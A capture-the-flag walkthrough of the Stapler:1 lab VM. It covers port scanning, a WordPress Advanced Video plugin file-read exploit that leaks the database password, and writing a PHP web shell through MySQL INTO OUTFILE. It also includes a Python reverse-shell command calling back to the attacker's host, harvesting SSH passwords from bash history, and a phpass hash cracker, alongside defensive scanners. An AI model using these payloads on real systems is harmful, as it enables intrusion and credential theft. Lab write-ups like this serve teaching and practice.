Stapler: 1

Find target:

root@kali:~# nmap 172.16.219.0/24

Starting Nmap 7.31 ( https://nmap.org ) at 2018-01-25 09:26 PST

Nmap scan report for 172.16.219.178
Host is up (0.00051s latency).
Not shown: 992 filtered ports
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
53/tcp   open   domain
80/tcp   open   http
139/tcp  open   netbios-ssn
666/tcp  open   doom
3306/tcp open   mysql
MAC Address: 00:0C:29:5C:A2:AF (VMware)


Nmap done: 256 IP addresses (5 hosts up) scanned in 205.65 seconds

Scan the target:

root@kali:~# nmap -T4 -A -p- 172.16.219.178

Starting Nmap 7.31 ( https://nmap.org ) at 2018-01-25 11:14 PST
Nmap scan report for 172.16.219.178
Host is up (0.0014s latency).
Not shown: 65523 filtered ports
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|_  256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   doom?
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 13
|   Capabilities flags: 63487
|   Some Capabilities: ODBCClient, Speaks41ProtocolOld, FoundRows, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, ConnectWithDatabase, DontAllowDatabaseTableColumn, LongPassword, IgnoreSigpipes, Speaks41ProtocolNew, SupportsCompression, InteractiveClient, LongColumnFlag, Support41Auth, SupportsTransactions, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: Q\x08W%#oqB%J\x0F\x11    \x16,W\x1Fxad\x00
|_  Auth Plugin Name: 88
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
... ...

Host script results:
|_clock-skew: mean: 24s, deviation: 0s, median: 24s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: red
|   NetBIOS computer name: RED
|   Domain name: 
|   FQDN: red
|_  System time: 2018-01-25T19:16:19+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Post-scan script results:
| clock-skew: 
|_  24s: Majority of systems scanned
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.25 seconds

Check the web services. http://172.16.219.178/ (port 80) returns a 404; dirb and nikto against it only found two files, .bashrc and .profile. Port 12380 is also open and runs Apache httpd, so run dirb and nikto against 172.16.219.178:12380.

root@kali:~# dirb http://172.16.219.178:12380

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jan 25 11:26:54 2018
URL_BASE: http://172.16.219.178:12380/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://172.16.219.178:12380/ ----

-----------------
END_TIME: Thu Jan 25 11:27:45 2018
DOWNLOADED: 4612 - FOUND: 0
root@kali:~# nikto -host 172.16.219.178:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.219.178
+ Target Hostname:    172.16.219.178
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/[email protected]
+ Start Time:         2018-01-25 11:28:21 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '172.16.219.178' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2018-01-25 11:30:10 (GMT-8) (109 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

dirb reports FOUND: 0 because it was pointed at http:// while 12380 speaks TLS (nikto's SSL Info block shows the self-signed Initech certificate; nikto switched to HTTPS on its own). Re-run dirb against https://172.16.219.178:12380/ to get a real listing. nikto's robots.txt check yields two entries, /admin112233/ and /blogblog/, plus a /phpmyadmin/ directory and a certificate CN of Red.Initech.

Browse to https://172.16.219.178:12380/blogblog/ and read the posts. Note the WEEK1 post:

I'm not familiar with WordPress plugins; after googling a little bit,

So let's navigate to https://172.16.219.178:12380/blogblog/wp-content/ (Apache directory listing is enabled, so the tree can be browsed directly).

Inside the plugins folder there are several plugins; the one worth checking is the Advanced Video plugin, which the searchsploit query below targets.

In Kali Linux you can use the searchsploit command to search a local copy of the Exploit Database:

root@kali:~# searchsploit advanced video
--------------------------------------------- ----------------------------------
 Exploit Title                               |  Path
                                             | (/usr/share/exploitdb/platforms)
--------------------------------------------- ----------------------------------
WordPress Plugin Advanced Video 1.0 - Local  | ./php/webapps/39646.py
--------------------------------------------- ----------------------------------

The exploit is a Python 2 script built on urllib2. It needs two edits: add the ssl lines so urllib2 accepts the server's self-signed certificate, and point url at the blog:

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

url = "https://172.16.219.178:12380/blogblog" # insert url to wordpress

Run the script locally, then browse to the uploads folder at https://172.16.219.178:12380/blogblog/wp-content/uploads/. A new picture has appeared. The exploit points the plugin's thumbnail path at ../wp-config.php and the plugin copies that file into uploads under a numeric .jpeg name, so the "picture" is really the site's configuration file. Download it and cat it locally:

root@kali:~/Downloads# cat ../Desktop/1568214632.jpeg 
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, and ABSPATH. You can find more information by visiting
 * {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
 * Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY',  'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY',    'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY',        'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT',        'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT',   '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT',       'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each a unique
 * prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

define('WP_HTTP_BLOCK_EXTERNAL', true);
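What landed in uploads is wp-config.php with a .jpeg extension, and the web server will happily serve it. The check a defender (or an attacker auditing an uploads directory) wants is content-versus-extension: image files should start with their format's magic bytes and never contain a PHP open tag. The following is an added example of my own, not code from the original write-up; the sample files at the bottom are constructed, with the 1568214632.jpeg entry mimicking the leaked config shown above.

```python
import re

# Added example (not from the original write-up): flag files in an uploads
# directory whose content does not match what their extension promises.
# The sample inputs at the bottom are constructed, not pulled from the VM.

# Leading magic bytes for the image types a WordPress uploads dir should hold.
IMAGE_MAGIC = {
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}
# Extensions that should never exist under uploads at all.
EXEC_EXTS = {".php", ".php5", ".phtml", ".phar"}

PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
# wp-config.php gives itself away by its define() calls for DB and cookie secrets.
WP_SECRET = re.compile(rb"define\(\s*['\"](?:DB_PASSWORD|AUTH_KEY|SECURE_AUTH_KEY|NONCE_KEY)['\"]")


def classify_upload(name: str, data: bytes) -> dict:
    """Classify one file (name + raw bytes) from wp-content/uploads.

    verdict is one of:
      'leak'       - looks like wp-config.php (database password / auth keys)
      'suspicious' - PHP code, an executable extension, or image magic missing
      'ok'         - content matches the extension
    """
    dot = name.rfind(".")
    ext = name[dot:].lower() if dot != -1 else ""
    head = data[:4096]                       # PHP tags normally sit near the top
    magic_ok = any(head.startswith(m) for m in IMAGE_MAGIC.get(ext, ()))
    php_tag = PHP_OPEN_TAG.search(head) is not None
    wp_config = WP_SECRET.search(data) is not None

    if wp_config:
        verdict = "leak"
    elif php_tag or ext in EXEC_EXTS or (ext in IMAGE_MAGIC and not magic_ok):
        verdict = "suspicious"
    else:
        verdict = "ok"
    return {"name": name, "ext": ext, "magic_ok": magic_ok,
            "php_tag": php_tag, "wp_config": wp_config, "verdict": verdict}


def scan_uploads(files: dict) -> list:
    """Classify every name -> bytes pair and return only the findings."""
    results = (classify_upload(n, d) for n, d in files.items())
    return [r for r in results if r["verdict"] != "ok"]


# Constructed samples: a JPEG header, a 'JPEG' that is really wp-config.php
# (as in the write-up), a JPEG with PHP appended (polyglot), the sh.php web
# shell written later in the write-up, and a harmless text file.
SAMPLES = {
    "real.jpeg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 64,
    "1568214632.jpeg": (b"<?php\n/**\n * The base configurations of the WordPress.\n */\n"
                        b"define('DB_NAME', 'wordpress');\n"
                        b"define('DB_USER', 'root');\n"
                        b"define('DB_PASSWORD', 'plbkac');\n"),
    "poly.jpeg": (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 64
                  + b"<?php system($_GET['c']); ?>"),
    "sh.php": b"<?php echo shell_exec($_GET['cmd']);?>\n",
    "notes.txt": b"nothing to see here\n",
}

if __name__ == "__main__":
    for r in scan_uploads(SAMPLES):
        print(f"{r['name']:18} {r['verdict']:10} magic_ok={r['magic_ok']} "
              f"php_tag={r['php_tag']} wp_config={r['wp_config']}")
```

The polyglot case (valid JPEG header with PHP appended) is why the check looks for a PHP tag even when the magic bytes are right; a magic-only check would pass it.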

Yeahhhh!! We have the database name, username and password, and the database user is root. MySQL is exposed on 3306 (see the nmap output) and root is allowed to log in from a remote host, so connect from Kali (-p prompts for the password, plbkac):

root@kali:~/Desktop# mysql -h 172.16.219.178 -u root -p wordpress
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 44
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select database();
+------------+
| database() |
+------------+
| wordpress  |
+------------+
1 row in set (0.00 sec)

mysql> select table_name from information_schema.tables where table_schema='wordpress';
+-----------------------+
| table_name            |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
11 rows in set (0.00 sec)

mysql> select column_name from information_schema.columns where table_schema='wordpress' and table_name='wp_users';
+---------------------+
| column_name         |
+---------------------+
| ID                  |
| user_login          |
| user_pass           |
| user_nicename       |
| user_email          |
| user_url            |
| user_registered     |
| user_activation_key |
| user_status         |
| display_name        |
+---------------------+
10 rows in set (0.00 sec)

mysql> select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/html/blogblog/wp-content/uploads/sh.php";
ERROR 1 (HY000): Can't create/write to file '/var/www/html/blogblog/wp-content/uploads/sh.php' (Errcode: 2 - No such file or directory)
mysql> select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/sh.php";
Query OK, 1 row affected (0.00 sec)


mysql>

The INTO OUTFILE write only works because we are MySQL root, which holds the FILE privilege, secure_file_priv is not restricting the destination, and the mysqld process can write into the uploads directory. The first attempt failed only because this vhost's document root is /var/www/https, not /var/www/html. With sh.php in place, use it to launch a reverse shell back to Kali. I used the Python reverse shell from this page: https://highon.coffee/blog/reverse-shell-cheat-sheet/

In Kali run nc -lvp 80, replace myKali-IP with your own address, and in the browser navigate to:

https://172.16.219.178:12380/blogblog/wp-content/uploads/sh.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("myKali-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The browser URL-encodes the spaces and quotes in the cmd value for you; if you use curl instead, pass the payload with -G --data-urlencode 'cmd=...' (and -k for the self-signed certificate). Now we have the shell:

root@kali:# nc -lvp 80
listening on [any] 80 ...
172.16.219.178: inverse host lookup failed: Unknown host
connect to [172.16.219.177] from (UNKNOWN) [172.16.219.178] 46008
/bin/sh: 0: can't access tty; job control turned off
$ ls
1568214632.jpeg
228062103.jpeg
560193514.jpeg
651071434.jpeg
679463507.jpeg
85777840.jpeg
exp.php
exp2.php
exp3.php
sh.php
shell.php
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

I tried spawning a TTY shell but nothing happened (Spawning a TTY Shell). Let's look at the users on the system to see if there is anything useful.

$ ls /home
ls /home
AParnell  Drew          JBare    LSolum2    RNunemaker  Sam     jess   www
CCeaser   ETollefson  JKanode  MBassin    SHAY        Taylor  kai    zoe
CJoo      Eeth          JLipps   MFrei    SHayslett   elly    mel
DSwanger  IChadwick   LSolum   NATHAN    SStroud     jamie   peter
$ ls -al AParnell
ls -al AParnell
total 24
drwxr-xr-x  2 AParnell AParnell 4096 Jun  5  2016 .
drwxr-xr-x 32 root     root     4096 Jun  4  2016 ..
-rw-r--r--  1 root     root        5 Jun  5  2016 .bash_history
-rw-r--r--  1 AParnell AParnell  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 AParnell AParnell 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 AParnell AParnell  675 Sep  1  2015 .profile
$ cat AParnell/.bash_history
cat AParnell/.bash_history
exit
... ...
$ cat JKanode/.bash_history
cat JKanode/.bash_history
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
$

After looking into each user's directory, I found JKanode's and peter's SSH passwords in JKanode's .bash_history!
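JKanode's history is the classic loot: sshpass -p puts the password on the command line, so it ends up in .bash_history (and in ps output, which JKanode was also running). As an added example of my own, not code from the original write-up, here is a small scanner that pulls such secrets out of a set of history files. The first two patterns cover what the history above shows (sshpass -p and mysql -p); the remaining patterns generalise the idea to HTTP basic-auth flags, credentials embedded in URLs and exported PASSWORD/SECRET/TOKEN variables. The JKanode sample is the history quoted above; the 'dave' history, hostnames and passwords in it are constructed.

```python
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    user: str       # owner of the history file
    line_no: int
    kind: str       # which pattern fired
    account: str    # account the secret belongs to, when the command names one
    secret: str


# Added example (not from the original write-up). 'sshpass' and 'mysql' cover
# what JKanode's history shows; the rest generalise to other secrets that
# commonly end up in shell history.
PATTERNS = [
    ("sshpass",
     re.compile(r"sshpass\s+-p\s*(?P<secret>\S+)\s+.*?\b(?P<account>[\w.-]+@[\w.-]+)")),
    # 'mysql -u root -p wordpress' (prompt) is NOT matched: the secret must follow -p directly.
    ("mysql",
     re.compile(r"\bmysql\b(?:.*?\s-u\s*(?P<account>\S+))?.*?\s(?:-p|--password=)(?P<secret>[^\s-]\S*)")),
    ("basic-auth",
     re.compile(r"\b(?:curl|wget)\b.*?(?:-u|--user)\s+(?P<account>[^:\s]+):(?P<secret>\S+)")),
    ("url-cred",
     re.compile(r"[a-z][a-z0-9+.-]*://(?P<account>[^:/@\s]+):(?P<secret>[^@\s]+)@")),
    ("env-var",
     re.compile(r"(?:^|\s)(?:export\s+)?(?P<account>\w*(?:PASS|PASSWORD|SECRET|TOKEN)\w*)=(?P<secret>\S+)", re.I)),
]


def scan_history(user: str, text: str) -> List[Finding]:
    """Run every pattern over every line of one user's history."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for kind, pat in PATTERNS:
            m = pat.search(line)
            if m:
                g = m.groupdict()
                findings.append(Finding(user, n, kind, g.get("account") or "", g["secret"]))
    return findings


def scan_home(histories: dict) -> List[Finding]:
    """histories maps user -> contents of that user's .bash_history."""
    out = []
    for user, text in histories.items():
        out.extend(scan_history(user, text))
    return out


# Constructed sample histories. JKanode's lines are the ones quoted in the
# write-up; 'dave' is made up to exercise the other patterns.
SAMPLE_HISTORIES = {
    "JKanode": "\n".join([
        "id", "whoami", "ls -lah", "pwd", "ps aux",
        "sshpass -p thisimypassword ssh JKanode@localhost",
        "apt-get install sshpass",
        "sshpass -p JZQuyIN5 peter@localhost",
        "ps -ef", "top", "kill -9 3747", "exit",
    ]),
    "dave": "\n".join([
        "mysql -h 127.0.0.1 -u root -p wordpress",
        "mysql -u root -pplbkac wordpress -e 'select user_login,user_pass from wp_users'",
        "curl -k -u admin:hunter2 https://red.initech:12380/admin112233/",
        "git clone https://bob:s3cret@git.example.org/initech/todo.git",
        "export DB_PASSWORD=plbkac",
    ]),
}

if __name__ == "__main__":
    for f in scan_home(SAMPLE_HISTORIES):
        print(f"{f.user:8} line {f.line_no:2} {f.kind:10} {f.account or '-':20} {f.secret}")
```

Run it as-is to see the two sshpass hits plus the constructed ones; on a real box you would feed it the contents of every readable /home/*/.bash_history (and .mysql_history, .psql_history) instead of SAMPLE_HISTORIES. Note that the interactive form, mysql -p with no value, is deliberately not reported: the password never touched the command line.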

Check peter's home directory:

$ ls -la peter
ls -la peter
total 72
drwxr-xr-x  3 peter peter  4096 Jun  3  2016 .
drwxr-xr-x 32 root  root   4096 Jun  4  2016 ..
-rw-------  1 peter peter     1 Jun  5  2016 .bash_history
-rw-r--r--  1 peter peter   220 Jun  3  2016 .bash_logout
-rw-r--r--  1 peter peter  3771 Jun  3  2016 .bashrc
drwx------  2 peter peter  4096 Jun  6  2016 .cache
-rw-r--r--  1 peter peter   675 Jun  3  2016 .profile
-rw-r--r--  1 peter peter     0 Jun  3  2016 .sudo_as_admin_successful
-rw-------  1 peter peter   577 Jun  3  2016 .viminfo
-rw-rw-r--  1 peter peter 39206 Jun  3  2016 .zcompdump
$

peter's home directory is the more interesting one: .sudo_as_admin_successful is created by Ubuntu's sudo the first time a member of the admin/sudo group runs sudo successfully, so peter most likely has sudo rights. So I'll try to ssh in with peter's creds.

Alternatively, with the SQL creds in hand, we can dump and crack user_pass. (Writing into the web root as below leaves the hashes world-readable; selecting user_login, user_pass directly in the client avoids that.)

mysql> select user_pass from wp_users into outfile "/var/www/https/blogblog/wp-content/uploads/pass.txt";
Query OK, 16 rows affected (0.00 sec)

mysql>

Put the hashes into one file and crack them with hashcat. Mode 400 is phpass, the portable $P$ format WordPress uses for wp_users.user_pass; with rockyou.txt I got the following:

root@kali:~/Downloads# hashcat -m 400 h.txt /usr/share/wordlists/rockyou.txt --force
hashcat (pull/1273/head) starting...

OpenCL Platform #1: The pocl project
... ...

$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1:football               
$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1:cookie                 
$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0:monkey                 
$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0:coolgirl
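hashcat does the work above, but it helps to see what mode 400 actually computes: a phpass "portable" hash is MD5 of salt+password, then 2^13 rounds (the 'B' after $P$) of MD5 over hash+password, encoded with phpass' own base64 alphabet. The block below is an added example of my own, not code from the original write-up or from WordPress; it reimplements the algorithm in Python and runs a dictionary attack against the four hashes from the hashcat output above. The wordlist is a constructed stand-in for rockyou.txt; the general dictionary-attack loop goes beyond the single hashcat run on the page.

```python
import hashlib
import hmac
from typing import Dict, Iterable

# Added example (not from the original write-up): the phpass 'portable' hash
# that WordPress stores in wp_users.user_pass (hashcat mode 400), reimplemented
# so the cracking step is visible. HASHES are the four from the hashcat output
# above; WORDLIST is constructed.

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass' own base64 variant (not RFC 4648): no padding, different alphabet."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def phpass_hash(password: str, setting: str) -> str:
    """Recompute a $P$ hash: setting = '$P$' + log2(rounds) char + 8-char salt."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])      # WordPress uses 'B' -> 2**13 rounds
    if not 7 <= count_log2 <= 30:
        raise ValueError("bad iteration count")
    salt = setting[4:12].encode()
    pw = password.encode()
    h = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.md5(h + pw).digest()        # MD5 chained, password fed in every round
    return setting[:12] + _encode64(h, 16)


def phpass_verify(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash with the stored one."""
    return hmac.compare_digest(phpass_hash(password, stored), stored)


def crack(hashes: Iterable[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Dictionary attack: returns {hash: password} for every hash reproduced."""
    words = list(wordlist)
    found = {}
    for stored in hashes:
        for word in words:
            if phpass_verify(word, stored):
                found[stored] = word
                break
    return found


# The four hashes hashcat recovered above (from the VM's wp_users table).
HASHES = [
    "$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1",
    "$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1",
    "$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0",
    "$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0",
]
# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "123456", "letmein", "football", "cookie", "monkey", "coolgirl"]

if __name__ == "__main__":
    for stored, word in crack(HASHES, WORDLIST).items():
        print(f"{stored}:{word}")
```

8192 MD5 rounds per guess is why hashcat on a GPU beats this loop by orders of magnitude, but it is also why the format is weak by modern standards: MD5 is fast and the round count is fixed at WordPress' 2006-era default. The same routine verifies any $P$ or $H$ hash (phpBB uses $H$), so it is useful wherever you pull a phpass hash out of a database.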

Use each recovered password with its corresponding user_login to log in at https://172.16.219.178:12380/blogblog/wp-admin/

Then upload a PHP shell through the dashboard to get code execution as www-data.
